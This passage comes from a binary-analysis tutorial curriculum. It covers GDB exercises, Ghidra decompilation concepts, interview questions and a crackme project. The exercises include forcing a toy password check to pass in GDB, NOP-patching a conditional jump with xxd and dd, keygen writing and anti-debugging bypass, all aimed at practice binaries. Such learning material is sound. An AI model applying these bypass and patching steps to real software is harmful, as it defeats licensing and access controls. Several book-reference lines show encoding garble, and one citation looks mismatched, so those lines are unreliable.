Exercise 1: Follow a Function Call Chain Compile this with gcc -g:

#include <stdio.h>
int add(int a, int b) { return a + b; }
int calculate(int x) { return add(x, 10); }
int main() {
    int result = calculate(5);
    printf("Result: %d\n", result);
    return 0;
}

In GDB:

  1. Set breakpoint on main
  2. Run and step into calculate (use step, not next)
  3. Step into add
  4. At each frame, use backtrace to see the call stack
  5. Use frame 1 to inspect calculate’s local variables
  6. Use up and down to navigate frames

Exercise 2: Find Where a Variable Changes

#include <stdio.h>
int main(void) {
    int secret = 100;
    secret += 20;
    secret *= 2;
    secret -= 50;
    printf("Secret: %d\n", secret);
    return 0;
}

Use a watchpoint:

  1. Break at first line of main
  2. Run to breakpoint
  3. watch secret (sets watchpoint on the variable)
  4. continue repeatedly, noting when and where secret changes
  5. Examine the assembly at each trigger point

Exercise 3: Modify Execution Flow Compile a password checker:

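#include <string.h>
#include <stdio.h>
int check_password(const char *pass) {
    return strcmp(pass, "letmein") == 0;
}
int main(void) {
    char input[50];
    if (fgets(input, sizeof input, stdin) == NULL) {
        return 1;
    }
    input[strcspn(input, "\n")] = '\0';  /* fgets keeps the newline; strip it before comparing */
    if (check_password(input)) {
        printf("Access granted!\n");
    } else {
        printf("Access denied!\n");
    }
    return 0;
}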

In GDB, bypass the check:

  1. Break on check_password, run, and enter a wrong password
  2. Use finish to return to main; $rax now holds the return value of check_password
  3. Use set $rax = 1 to force success
  4. continue and see “Access granted” despite the wrong password

Exercise 4: Examine Data Structures

struct person {
    char name[20];
    int age;
    float salary;
};

int main() {
    struct person p = {"Alice", 30, 75000.0};
    return 0;
}

In GDB:

  1. Break after struct initialization
  2. print p (shows entire structure)
  3. print p.name
  4. print &p (shows address)
  5. x/20xb &p (examine the first 20 raw bytes, which hold the name field)
  6. ptype p (shows structure definition)
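Before looking at the raw bytes in GDB, it helps to predict them. The sketch below packs the same values with Python’s struct module, assuming a little-endian target with 4-byte int and float and no padding between these fields (the usual layout on x86-64 Linux). The hexdump helper is just for display.

```python
import struct

# char name[20]; int age; float salary;  -> 20 + 4 + 4 = 28 bytes
PERSON = struct.Struct("<20sif")
blob = PERSON.pack(b"Alice", 30, 75000.0)


def hexdump(data, width=8):
    """Format bytes as rows of hex pairs, similar to GDB's x/..xb output."""
    rows = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        rows.append("{:#04x}: {}".format(off, " ".join("{:02x}".format(b) for b in chunk)))
    return "\n".join(rows)


print(PERSON.size)
print(hexdump(blob))
```

Under those assumptions, age sits at offset 20 as 1e 00 00 00 and salary at offset 24 as 00 7c 92 47, so x/28xb &p is what shows the whole structure.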

Exercise 5: Reverse Engineering a Stripped Binary Compile without -g and strip:

gcc -O2 -o mystery mystery.c
strip mystery

Now debug it:

  1. gdb mystery
  2. disassemble main fails (there is no symbol table), so find the entry point instead
  3. info files to see entry point
  4. break *0x... (break at address, not function name)
  5. Step through assembly, figuring out what the program does

This is real reverse engineering.

The Interview Questions They’ll Ask

  1. “How does GDB implement software breakpoints?”
    • GDB saves the original instruction byte at the breakpoint address, replaces it with int3 (0xCC on x86), and restores it when the breakpoint is removed. When int3 executes, the kernel raises SIGTRAP in the traced process and GDB is notified through ptrace.
  2. “What’s the difference between step and next?”
    • step steps into function calls; next steps over them, treating a call as a single step. stepi (si) and nexti (ni) are the instruction-level equivalents.
  3. “How can you find what caused a segmentation fault?”
    • Run the program in GDB. When it crashes, use backtrace to see the call stack, info registers to see register values, and x/i $rip to see the faulting instruction. Then check the register used as the address in that instruction; a value of 0 points to a NULL dereference.
  4. “Explain how watchpoints work.”
    • Watchpoints use hardware debug registers (DR0-DR3 on x86) to trigger exceptions when memory is accessed. Limited to 4 simultaneous watchpoints. Software watchpoints exist but are very slow (single-step execution).
  5. “How do you debug a program that immediately crashes?”
    • Use starti to stop at the very first instruction, long before main. If the crashing program is started via exec by the process you are debugging, catch exec stops right after the new image is loaded.
  6. “What’s the purpose of ASLR and how do you handle it in GDB?”
    • Address Space Layout Randomization places code/libraries at random addresses for security. GDB disables ASLR by default for programs it launches (set disable-randomization on), which keeps breakpoint addresses consistent between runs. Use set disable-randomization off to reproduce a randomized layout.
  7. “How do you debug a running process without restarting it?”
    • Use gdb -p <PID> to attach to a running process. Attaching stops the process; you can then set breakpoints and continue.
  8. “What’s the difference between a core dump and live debugging?”
    • A core dump is a snapshot of memory at crash time. You can debug it with gdb program core, but it’s read-only (no execution). Live debugging lets you run, modify, and restart.
  9. “How would you automatically log every function call?”
    • Write a Python script using GDB’s Python API. One approach: subclass gdb.Breakpoint, set it on the functions of interest, log the function name in its stop method, and return False so execution continues.
  10. “What information is lost when debugging a stripped binary?”
    • Function names, variable names, type information, source line mappings. You only have addresses, raw assembly, and sometimes dynamic symbols (from .dynsym).
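For question 9, a call logger could be sketched as follows. It assumes the target is the Exercise 1 program (functions add and calculate) and that the script is loaded inside GDB with source; the file name, the CallLogger class, and format_call are all hypothetical. The import guard only exists so the file can also be imported outside GDB.

```python
try:
    import gdb  # available only inside GDB's embedded Python interpreter
except ImportError:
    gdb = None


def format_call(callee, caller):
    """Build one log line; unknown names (stripped binaries) are shown as ??."""
    return "call {} <- {}".format(callee or "??", caller or "??")


if gdb is not None:

    class CallLogger(gdb.Breakpoint):
        """Breakpoint that logs the current function and its caller, then keeps running."""

        def stop(self):
            frame = gdb.selected_frame()
            older = frame.older()
            caller = older.name() if older is not None else None
            gdb.write(format_call(frame.name(), caller) + "\n")
            return False  # returning False tells GDB not to halt here

    # Assumed function names from the Exercise 1 program.
    for name in ("add", "calculate"):
        CallLogger(name)
```

Usage would look like: gdb ./target, then source call_logger.py, then run. Breaking on every function this way is slow on large programs, so it is best kept to a short list of interesting functions.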

Books That Will Help

| Topic | Book | Chapter/Section |
|---|---|---|
| GDB Basics | “The Art of Debugging with GDB, DDD, and Eclipse” by Matloff & Salzman | Ch. 1-3: GDB Fundamentals |
| Memory Layout | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch. 9: Virtual Memory |
| Stack and Calling Conventions | “Computer Systems: A Programmer’s Perspective” | Ch. 3.7: Procedures |
| Breakpoints Internals | “The Art of Debugging with GDB” | Ch. 2: Breakpoints |
| Watchpoints | “The Art of Debugging with GDB” | Ch. 3: Watchpoints and Catchpoints |
| GDB Python API | “The Art of Debugging with GDB” | Ch. 8: Other GDB Topics (Scripting) |
| Debugging Multi-threaded Programs | “The Art of Debugging with GDB” | Ch. 6: Debugging Multi-threaded Programs |
| Symbols and DWARF | “Practical Binary Analysis” by Dennis Andriesse | Ch. 5.3: Symbols and Stripped Binaries |
| Dynamic Analysis | “Practical Malware Analysis” by Sikorski & Honig | Ch. 3: Basic Dynamic Analysis |
| Reverse Engineering with GDB | “Practical Binary Analysis” | Ch. 5: Basic Binary Analysis in Linux |
| Exploitation and GDB | “Hacking: The Art of Exploitation” by Jon Erickson | Ch. 3: Exploitation (Using GDB) |
| Stack Smashing | “Hacking: The Art of Exploitation” | Ch. 3.3: Stack-Based Buffer Overflows |
| CPU Debug Registers | Intel 64/IA-32 SDM Volume 3 | Ch. 17: Debug, Branch Profile, TSC, and Quality of Service |
| Remote Debugging | GDB Documentation (official) | Remote Debugging section |
| Core Dumps | “The Art of Debugging with GDB” | Ch. 4: Core Files |

ASCII Diagram: GDB Process Interaction

+----------------------+          ptrace() system call          +--------------------+
|                      | <------------------------------------- |                    |
|   Target Process     |                                        |    GDB Debugger    |
|   (Your Program)     | --------------------------------------> |    (Controller)    |
|                      |          Memory read/write             |                    |
+----------------------+          Register access               +--------------------+
         |                        Set breakpoints                        |
         |                                                                |
         |                                                                |
         v                                                                v
+-------------------+                                            +-----------------+
| Virtual Memory    |                                            | GDB Commands    |
| +---------------+ |                                            | - break         |
| | Stack         | |  <-- GDB can read/write                    | - run           |
| | (local vars)  | |      any of this memory                    | - step/next     |
| +---------------+ |                                            | - print         |
| | Heap          | |                                            | - x (examine)   |
| | (malloc'd)    | |                                            | - set           |
| +---------------+ |                                            | - backtrace     |
| | .data         | |                                            | - disassemble   |
| | (globals)     | |                                            +-----------------+
| +---------------+ |
| | .text         | |
| | (code)        | |  <-- Software breakpoint: int3 (0xCC)
| | ...           | |      Hardware breakpoint: DR0-DR3 registers
| | 0x401000: RET | |
| +---------------+ |
+-------------------+

Breakpoint Mechanism:
  Original: 0x401000: 55        (push rbp)
  GDB sets: 0x401000: CC        (int3 trap instruction)
  When hit: Kernel sends SIGTRAP to GDB
  GDB:      Restores original byte (55)
            Shows user the breakpoint hit
            User can inspect/modify state
  Continue: Executes real instruction (55)
            Re-inserts breakpoint (CC) if persistent
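The breakpoint mechanism above can be simulated on a plain byte buffer. This is a sketch of the bookkeeping only: a bytearray stands in for the target’s .text, nothing is actually traced, and the class and method names are invented. It also shows one detail the diagram leaves implicit: after int3 executes, RIP points one byte past the breakpoint and has to be rewound.

```python
INT3 = 0xCC


class SoftwareBreakpoints:
    """Track original bytes so int3 patches can be inserted and undone."""

    def __init__(self, memory, base):
        self.memory = memory  # bytearray standing in for the target's code
        self.base = base      # address of memory[0]
        self.saved = {}       # breakpoint address -> original byte

    def insert(self, addr):
        if addr in self.saved:
            return
        off = addr - self.base
        self.saved[addr] = self.memory[off]
        self.memory[off] = INT3

    def remove(self, addr):
        self.memory[addr - self.base] = self.saved.pop(addr)

    def on_trap(self, rip):
        """Map the RIP reported after int3 back to the breakpoint address (rip - 1)."""
        addr = rip - 1
        if addr not in self.saved:
            raise KeyError("trap did not come from one of our breakpoints")
        return addr


text = bytearray.fromhex("554889e5c3")  # push rbp; mov rbp, rsp; ret
bps = SoftwareBreakpoints(text, base=0x401000)
bps.insert(0x401000)
patched = bytes(text)          # first byte is now 0xCC
hit = bps.on_trap(0x401001)    # the CPU stopped one byte past the int3
bps.remove(hit)                # restore 0x55 so the real instruction can run
print(patched.hex(), hex(hit), text.hex())
```

A real debugger would then single-step the restored instruction and re-insert the 0xCC byte, as the "Continue" step in the diagram describes.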

GDB Command Categories

Execution Control:
  run (r)              - Start program
  continue (c)         - Resume execution
  step (s)             - Step into (source line)
  stepi (si)           - Step into (instruction)
  next (n)             - Step over (source line)
  nexti (ni)           - Step over (instruction)
  finish               - Run until function returns
  until <location>     - Run until location

Breakpoints:
  break <where>        - Set breakpoint
    break main
    break *0x401000
    break file.c:42
  watch <expr>         - Break on write
  rwatch <expr>        - Break on read
  awatch <expr>        - Break on access
  catch <event>        - Break on event
    catch syscall write
  info breakpoints     - List all breakpoints
  delete <n>           - Delete breakpoint

Examination:
  print <expr>         - Print value
    print $rax
    print myvar
    print/x $rsp      (hex format)
  x/<n><f><u> <addr>   - Examine memory
    x/10i $rip        (10 instructions)
    x/20xw $rsp       (20 words in hex)
    x/s 0x402000      (string)
  info registers       - Show all registers
  info frame           - Current stack frame
  backtrace (bt)       - Call stack
  disassemble <where>  - Show assembly

Modification:
  set <var> = <value>  - Change variable
    set $rax = 0
    set myvar = 100
    set *(int*)0x401000 = 0x90909090

Process Info:
  info proc mappings   - Memory map
  info sharedlibrary   - Loaded libraries
  info threads         - List threads
  thread <n>           - Switch to thread

Python Scripting:
  python <code>        - Execute Python
  python-interactive   - Python REPL
  source script.py     - Run script

Key Insight: GDB isn’t just for finding bugs; it’s a reverse engineering Swiss Army knife. Combined with scripting, you can automate complex analysis: trace all heap allocations, log every comparison against a password, or build a complete call graph. Master GDB and you can observe what any binary you are able to run actually does.

Project 5: Ghidra Reverse Engineering

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Java (for scripts), Ghidra
  • Alternative Programming Languages: Python (built-in Jython, or Python 3 via the Ghidrathon extension)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 2. The “Micro-SaaS / Pro Tool”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Static Analysis / Decompilation
  • Software or Tool: Ghidra (NSA), sample binaries
  • Main Book: “Ghidra Software Reverse Engineering for Beginners”

What you’ll build: Complete reverse engineering of several binaries of increasing complexity, including writing Ghidra scripts for automation.

Why it teaches binary analysis: Ghidra is the most widely used free reverse engineering suite. Its decompiler produces C-like code from assembly, dramatically speeding up analysis.

Core challenges you’ll face:

  • Navigating Ghidra’s UI → maps to efficient workflow
  • Using the decompiler → maps to understanding control flow
  • Cross-references → maps to finding function usage
  • Writing scripts → maps to automating analysis

Resources for key challenges:

Key Concepts:

  • Code Browser: Ghidra documentation
  • Decompiler Window: “Ghidra RE for Beginners” Ch. 4
  • Ghidra Scripting: Ghidra API documentation

Difficulty: Intermediate Time estimate: 2-3 weeks Prerequisites: Projects 1-4, solid assembly knowledge

Real world outcome:

Analyzing a CTF crackme in Ghidra:

1. Load binary → Auto-analysis runs
2. Find main() → Entry point analysis
3. Decompile main() → See C-like code:

   int main(int argc, char **argv) {
       char input[32];
       printf("Enter password: ");
       scanf("%s", input);
       if (check_password(input)) {
           printf("Correct!\n");
       } else {
           printf("Wrong!\n");
       }
       return 0;
   }

4. Analyze check_password() → Find algorithm
5. Write keygen or patch binary

Implementation Hints:

Ghidra workflow:

  1. Create project → Import binary
  2. Let auto-analysis complete
  3. Navigate with ‘G’ (goto address) or symbol tree
  4. Use ‘L’ to rename functions/variables
  5. Use ‘;’ to add comments
  6. Use Ctrl+Shift+F (References → Show References to) to find cross-references

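Scripting example (Ghidra Python, run from the Script Manager):

# Find all calls to dangerous functions.
# getFunction and getReferencesTo are provided by Ghidra's script environment.
dangerous = ["gets", "strcpy", "sprintf"]
for func_name in dangerous:
    func = getFunction(func_name)  # None if no function with this name exists
    if func:
        refs = getReferencesTo(func.getEntryPoint())
        for ref in refs:
            # Skip data references; keep only call sites
            if ref.getReferenceType().isCall():
                # str.format instead of an f-string so this also runs under the built-in Jython (Python 2.7)
                print("Call to {} at {}".format(func_name, ref.getFromAddress()))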

Learning milestones:

  1. Navigate efficiently → Find functions, strings, imports
  2. Understand decompiler output → Read C-like code
  3. Rename and annotate → Make code understandable
  4. Write scripts → Automate repetitive analysis

The Core Question You’re Answering

How do you transform an opaque binary blob into understandable, analyzable code without access to source, and how can you automate this process at scale?

This project teaches you to bridge the gap between raw machine code and high-level logic using industry-standard tooling. You’ll learn not just to read binaries, but to make them readable for others.

Concepts You Must Understand First

1. Intermediate Representations (IR)

An IR is a translation layer between machine code and high-level code. Ghidra uses “P-Code” as its IR, which normalizes different CPU architectures into a common format.

Guiding Questions:

  • Why can’t decompilers directly translate assembly to C without an intermediate step?
  • How does P-Code handle architecture-specific quirks (endianness, calling conventions)?
  • What information is lost when converting from assembly to IR?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 6 - Binary Analysis Fundamentals

2. Control Flow Graphs (CFG)

CFGs represent program execution paths as nodes (basic blocks) and edges (jumps/branches). Ghidra automatically builds CFGs to understand program structure.

Guiding Questions:

  • What defines a basic block boundary (entry/exit points)?
  • How do conditional branches create multiple paths in a CFG?
  • Why are CFGs essential for decompilation quality?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 7 - Simple Code Injection
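The basic-block questions above can be explored with a toy CFG builder. This sketch uses the classic "leaders" rule (the first instruction, every branch target, and every instruction after a branch or return starts a block). The six-instruction program, the tuple format, and the function names are all invented for illustration; it is not how Ghidra represents code internally.

```python
COND = {"je", "jne"}
BRANCHES = COND | {"jmp"}


def find_leaders(instrs):
    """instrs: list of (addr, mnemonic, branch_target_or_None). Return block start addresses."""
    addrs = [addr for addr, _, _ in instrs]
    leaders = {addrs[0]}
    for i, (_, mnem, target) in enumerate(instrs):
        if mnem in BRANCHES or mnem == "ret":
            if target is not None:
                leaders.add(target)
            if i + 1 < len(instrs):
                leaders.add(addrs[i + 1])
    return leaders


def build_cfg(instrs):
    """Group instructions into basic blocks and compute successor edges."""
    leaders = find_leaders(instrs)
    blocks, current = {}, None
    for ins in instrs:
        if ins[0] in leaders:
            current = ins[0]
            blocks[current] = []
        blocks[current].append(ins)
    starts = sorted(blocks)
    edges = {}
    for i, start in enumerate(starts):
        _, mnem, target = blocks[start][-1]
        succ = []
        if mnem in BRANCHES:
            succ.append(target)        # taken edge
        if mnem not in ("jmp", "ret") and i + 1 < len(starts):
            succ.append(starts[i + 1])  # fall-through edge
        edges[start] = succ
    return blocks, edges


# Hypothetical password check: compare, then return 1 (success) or 0 (failure).
program = [
    (0, "cmp", None),
    (1, "jne", 4),
    (2, "mov", None),   # success path
    (3, "jmp", 5),
    (4, "mov", None),   # failure path
    (5, "ret", None),
]
blocks, edges = build_cfg(program)
print(edges)  # {0: [4, 2], 2: [5], 4: [5], 5: []}
```

The conditional jne is what gives block 0 two outgoing edges; drawing those edges by hand is the manual CFG exercise later in this project.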

3. Data Flow Analysis

Understanding how data moves through a program (from parameters through operations to return values) is key to renaming variables meaningfully.

Guiding Questions:

  • How do you track a value from function entry to its use in a comparison?
  • What’s the difference between reaching definitions and use-def chains?
  • How does stack frame analysis help identify local variables vs parameters?

Book Reference: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7 - Procedures

4. Type Inference

Decompilers guess variable types from their usage (pointer arithmetic, function calls, comparisons). Understanding this helps you correct wrong guesses.

Guiding Questions:

  • How does Ghidra infer that mov rax, [rbx] suggests rbx is a pointer?
  • What clues indicate a variable is a string vs a byte array?
  • When do you need to manually fix type annotations?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 6.3 - Disassembly and Binary Analysis Fundamentals

5. Symbol Resolution

Binaries often lack symbol names. Learning to identify functions by their behavior (string references, API calls) is critical.

Guiding Questions:

  • How do you identify main() in a stripped binary?
  • What patterns indicate a function is a constructor vs destructor?
  • How do import tables help identify library functions?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 5 - Basic Binary Analysis in Linux

6. Cross-References (Xrefs)

Xrefs show where data/code is used. They’re essential for understanding program flow and finding all uses of a particular function or string.

Guiding Questions:

  • What’s the difference between “calls to” and “called by” in xref analysis?
  • How do you use xrefs to find all error-handling code paths?
  • Why do string references often lead directly to interesting functionality?

Book Reference: โ€œGhidra Software Reverse Engineering for Beginnersโ€ Ch. 3

7. Calling Conventions

Different platforms pass arguments differently (stack vs registers, order, cleanup responsibility). Ghidra auto-detects these but you need to verify.

Guiding Questions:

  • What’s the difference between __cdecl, __stdcall, and __fastcall?
  • How does x64’s register-based calling differ from x86’s stack-based?
  • When does Ghidra get calling conventions wrong?

Book Reference: โ€œLow-Level Programmingโ€ Ch. 9 - Calling Conventions
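When verifying a calling convention Ghidra picked, it helps to know where each argument should be. The sketch below covers only integer and pointer arguments for the two common x86-64 conventions; floating-point arguments, structs passed by value, and the Microsoft shadow space are ignored, and the stack[n] labels are just ordinal positions, not real offsets. The dictionary keys and function name are made up for this example.

```python
# Integer/pointer argument registers, in order.
INT_ARG_REGS = {
    "sysv_amd64": ["rdi", "rsi", "rdx", "rcx", "r8", "r9"],  # Linux, macOS, BSD
    "ms_x64": ["rcx", "rdx", "r8", "r9"],                    # Windows x64
}


def arg_locations(convention, n_args):
    """Return where the first n_args integer arguments are passed."""
    regs = INT_ARG_REGS[convention]
    locations = []
    for i in range(n_args):
        if i < len(regs):
            locations.append(regs[i])
        else:
            locations.append("stack[{}]".format(i - len(regs)))
    return locations


print(arg_locations("sysv_amd64", 3))  # ['rdi', 'rsi', 'rdx']
print(arg_locations("ms_x64", 5))      # ['rcx', 'rdx', 'r8', 'r9', 'stack[0]']
```

If the decompiler shows a parameter arriving in a register that does not fit the detected convention, that is a strong hint the signature needs manual correction.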

8. Ghidra Scripting API

Automating analysis with scripts lets you handle repetitive tasks (renaming, searching, reporting) efficiently.

Guiding Questions:

  • What’s the difference between Ghidra’s Java API and Python (Ghidrathon)?
  • How do you iterate over all functions in a program?
  • When should you write a script vs use built-in features?

Book Reference: Official Ghidra API Documentation (included with Ghidra)

Questions to Guide Your Design

  1. How do you efficiently navigate a 100,000-line decompiled binary to find the password validation logic? Consider string searches, API call tracking, and symbolic execution.

  2. When Ghidra’s decompiler produces confusing code (nested ternaries, weird casts), what strategies help you simplify it? Think about variable renaming, type fixing, and understanding the original source idiom.

  3. How would you write a script to find all uses of dangerous functions (strcpy, gets, sprintf) across multiple binaries? Consider iteration, filtering, and reporting.

  4. What workflow lets you collaborate with teammates on reversing a large binary? Think about Ghidra project sharing, version control, and annotation standards.

  5. How do you handle obfuscated or packed binaries that confuse Ghidra’s auto-analysis? Consider manual disassembly, unpacking, and custom analysis passes.

  6. What’s your process for documenting your reverse engineering findings so others can understand them? Think about commenting standards, structure diagrams, and pseudocode.

  7. How would you diff two versions of a binary to find what changed in a security patch? Consider Ghidra’s version tracking and binary diffing capabilities.

  8. When analyzing malware, what sandbox/isolation setup ensures your Ghidra analysis doesn’t trigger malicious behavior? Think about static vs dynamic analysis boundaries.

Thinking Exercise

Before writing any Ghidra scripts, complete this exercise:

  1. Manual CFG Construction: Take a simple crackme binary (20-30 functions). Draw the control flow graph of the password validation function by hand:
    • Identify basic blocks (sequences ending in jumps/branches)
    • Draw edges for conditional and unconditional jumps
    • Label edges with conditions (e.g., “password correct”, “length check failed”)
    • Mark which paths lead to success vs failure
  2. Type Inference Practice: Look at this decompiled snippet:
    undefined8 FUN_00401234(long param_1) {
        long lVar1;
        lVar1 = param_1 + 0x10;
        *lVar1 = 0x41414141;
        return 0;
    }
    

    Without running it, infer:

    • Is param_1 a struct pointer? Array? Something else?
    • What type should lVar1 be (not just long)?
    • What's really happening in *lVar1 = 0x41414141?
    • Rewrite it with meaningful names and types.
  3. Cross-Reference Tracing: In a binary with debug symbols removed:
    • Find the string "Invalid password" in Ghidra
    • Use xrefs to find which function displays it
    • Trace back to find what calls that function
    • Continue until you find the entry point (main)
    • Document the call chain: main() -> login_handler() -> validate_password() -> error_message()
  4. API Identification: Open a Windows PE binary in Ghidra:
    • List all imported DLLs and functions (use Imports window)
    • Categorize APIs: networking (ws2_32.dll), crypto (advapi32.dll), file I/O (kernel32.dll)
    • For each interesting import, find all calls to it
    • Infer program capabilities (e.g., "Connects to network, encrypts files")
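
The basic-block step of the first exercise follows the classic "leaders" rule: a block starts at the first instruction, at every branch target, and at every instruction that follows a branch. The sketch below illustrates that rule only; the instruction tuples and the mnemonic set are hypothetical stand-ins for a disassembler listing, not Ghidra's API.

```python
from typing import List, Optional, Tuple

# Hypothetical instruction record: (address, mnemonic, branch target or None)
Insn = Tuple[int, str, Optional[int]]

# Illustrative subset of control-transfer mnemonics (not exhaustive)
BRANCHES = {"jmp", "je", "jne", "jz", "jnz", "jg", "jl", "jge", "jle", "ja", "jb"}
TERMINATORS = BRANCHES | {"ret"}


def basic_blocks(insns: List[Insn]) -> List[List[int]]:
    """Split a linear listing into basic blocks (lists of addresses)."""
    addrs = {addr for addr, _, _ in insns}
    leaders = {insns[0][0]} if insns else set()
    for i, (_, mnem, target) in enumerate(insns):
        if mnem in TERMINATORS:
            if target in addrs:          # a branch target starts a block
                leaders.add(target)
            if i + 1 < len(insns):       # so does the instruction after a branch
                leaders.add(insns[i + 1][0])
    blocks, current = [], []
    for addr, _, _ in insns:
        if addr in leaders and current:  # close the running block at each leader
            blocks.append(current)
            current = []
        current.append(addr)
    if current:
        blocks.append(current)
    return blocks


# Made-up if/else shaped listing
listing = [
    (0x1000, "cmp", None),
    (0x1003, "jne", 0x100A),
    (0x1005, "mov", None),
    (0x1008, "jmp", 0x100D),
    (0x100A, "mov", None),
    (0x100D, "ret", None),
]
for block in basic_blocks(listing):
    print([hex(a) for a in block])
```

Drawing the edges is then a matter of connecting each block's last instruction to its branch target and, for conditional jumps, to the fall-through block.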

The Interview Questions They'll Ask

  1. "Explain how Ghidra's decompiler works at a high level. What are the major stages?" Expected: Disassembly → CFG construction → P-Code conversion → SSA form → Type inference → C code generation

  2. "You're reversing a binary and Ghidra shows a function with 50 parameters. What went wrong and how do you fix it?" Expected: Ghidra misidentified the calling convention or function boundary. Check for stack frame setup, use "Edit Function Signature", verify with debugging.

  3. "How would you use Ghidra to find all SQL injection vulnerabilities in a closed-source web server binary?" Expected: Search for SQL keywords in strings, xref to find query-building code, trace backwards to find unsanitized user input paths.

  4. "What's the difference between Ghidra's P-Code and LLVM IR? Why does Ghidra use P-Code?" Expected: P-Code is designed for decompilation (reverse direction), LLVM IR for compilation (forward). P-Code is simpler and architecture-neutral.

  5. "Walk me through your process for analyzing a stripped binary with no symbols." Expected: Find entry point → identify main (heuristics: called once, calls many) → name key functions → follow interesting strings → build call graph.

  6. "You need to analyze 100 similar malware samples. How do you automate commonality extraction with Ghidra?" Expected: Write headless Ghidra script to batch-process samples, extract features (strings, APIs, crypto constants), generate similarity matrix.

  7. "Ghidra's decompiler shows code that couldn't possibly compile. Give three reasons why." Expected: Hand-written assembly with no C equivalent, compiler optimizations (like overlapping variables), incorrect type inference.

  8. "How do you identify crypto algorithms (AES, SHA256) in decompiled code?" Expected: Look for characteristic constants (AES S-box: 0x63, 0x7c, ...), specific bit operations, large lookup tables, entropy analysis.

  9. "What are the limitations of static analysis with Ghidra vs dynamic analysis with a debugger?" Expected: Static can't handle runtime unpacking/decryption, indirect calls, or input-dependent behavior. Dynamic requires execution environment.

  10. "Describe a real scenario where writing a Ghidra script saved you significant time." Expected: Personal example, e.g., "Found all format string bugs in a 500KB binary by automating xref analysis of printf-family functions."

Books That Will Help

| Topic | Book | Chapter/Section |
|---|---|---|
| Ghidra Basics & UI | "Ghidra Software Reverse Engineering for Beginners" | Ch. 1-4 (Installation, UI, Basic Analysis) |
| Decompilation Theory | "Practical Binary Analysis" | Ch. 6 (Binary Analysis Fundamentals) |
| Control Flow Graphs | "Practical Binary Analysis" | Ch. 7 (Simple Code Injection) |
| x86/x64 Assembly | "Low-Level Programming" | Ch. 3-4 (Assembly Language, Syntax) |
| Calling Conventions | "Computer Systems: A Programmer's Perspective" | Ch. 3.7 (Procedures) |
| Stack Frames | "Computer Systems: A Programmer's Perspective" | Ch. 3.7.5 (Stack Frames) |
| Symbol Tables & Linking | "Computer Systems: A Programmer's Perspective" | Ch. 7 (Linking) |
| Reverse Engineering Methodology | "Reversing: Secrets of Reverse Engineering" | Ch. 1-3 (Foundations) |
| Static Analysis Techniques | "Practical Malware Analysis" | Ch. 1, 5 (Basic Static Analysis) |
| Ghidra Scripting (Java) | Official Ghidra Docs | GhidraAPI.html (included) |
| Ghidra Scripting (Python) | Ghidrathon GitHub Docs | README and examples |
| Binary File Formats (ELF) | "Practical Binary Analysis" | Ch. 2 (ELF Format) |
| Binary File Formats (PE) | "Practical Binary Analysis" | Ch. 3 (PE Format) |
| Data Flow Analysis | "Compilers: Principles, Techniques, and Tools" (Dragon Book) | Ch. 9 (Machine-Independent Optimizations) |
| Type Inference | "Practical Binary Analysis" | Ch. 6.3 (Disassembly) |
| Advanced Reversing | "The IDA Pro Book" | Ch. 5-8 (applies to Ghidra too) |

Project 6: Crackme Challenges

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly analysis, Python for keygens
  • Alternative Programming Languages: Any
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The "Resume Gold"
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Reverse Engineering / Password Bypass
  • Software or Tool: Ghidra, GDB, crackmes.one
  • Main Book: "Reversing: Secrets of Reverse Engineering" by Eldad Eilam

What you'll build: Solve 10+ crackme challenges of increasing difficulty, learning patching, keygen writing, and anti-debugging bypass.

Why it teaches binary analysis: Crackmes are purpose-built learning tools. They teach you to find and understand password checks, then bypass them.

Core challenges you'll face:

  • Finding the check → maps to string references, control flow
  • Understanding the algorithm → maps to decompilation, debugging
  • Patching vs keygen → maps to two approaches to bypass
  • Anti-debugging → maps to detection evasion

Resources for key challenges:

Key Concepts:

  • Patching: Tutorial #10 - The Levels of Patching
  • Keygen Writing: "Reversing" Ch. 5 - Eilam
  • Anti-Debugging Bypass: OpenRCE Anti-Reversing Database

Difficulty: Intermediate Time estimate: 2-4 weeks Prerequisites: Projects 4-5 (GDB, Ghidra)

Real world outcome:

# Approach 1: Patching
$ ./crackme
Enter password: wrong
Access Denied!

# Found the check: JNE (jump if not equal) to fail
# Patch JNE to JE (or NOP it out)
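$ xxd -g 1 -s 0x1234 -l 2 crackme   # dump the 2 bytes at file offset 0x1234 (default xxd grouping would print "7528")
00001234: 75 28  # JNE +0x28
$ printf '\x90\x90' | dd of=crackme bs=1 seek=4660 conv=notrunc   # 4660 = 0x1234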
$ ./crackme
Enter password: anything
Access Granted!

# Approach 2: Keygen
# Found algorithm: password = (username XOR 0x55) + 0x1337
$ python3 keygen.py "admin"
Valid password for 'admin': 0xAB12CD34

Implementation Hints:

Systematic approach:

  1. Run the binary to understand expected behavior
  2. Find strings ("Enter password", "Access Denied")
  3. Find cross-references to those strings
  4. Trace backwards to find the comparison
  5. Understand what makes it pass
  6. Either patch the jump or write a keygen

Patching levels:

  1. LAME: NOP out the check entirely
  2. Better: Invert the jump condition
  3. Good: Patch the comparison to always succeed
  4. Best: Understand algorithm, write keygen
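
Level 2 (inverting the jump) is a one-byte change for short conditional jumps: opcodes 0x70 through 0x7F come in pairs that differ only in the lowest bit, so JE (0x74) and JNE (0x75) swap with a single XOR. The sketch below works on an in-memory copy; the function name and the sample bytes are illustrative assumptions, and it deliberately ignores the two-byte near forms (0F 8x).

```python
def invert_short_jcc(image: bytes, offset: int) -> bytes:
    """Return a copy of image with the short conditional jump at offset inverted."""
    opcode = image[offset]
    if not 0x70 <= opcode <= 0x7F:
        raise ValueError(f"byte {opcode:#04x} at offset {offset:#x} is not a short Jcc")
    patched = bytearray(image)
    patched[offset] = opcode ^ 0x01   # e.g. 0x75 (JNE) <-> 0x74 (JE)
    return bytes(patched)


# Made-up code bytes: test eax,eax ; jne +0x28 ; nop
code = bytes.fromhex("85c0 7528 90")
print(invert_short_jcc(code, 2).hex())   # 85c0742890
```

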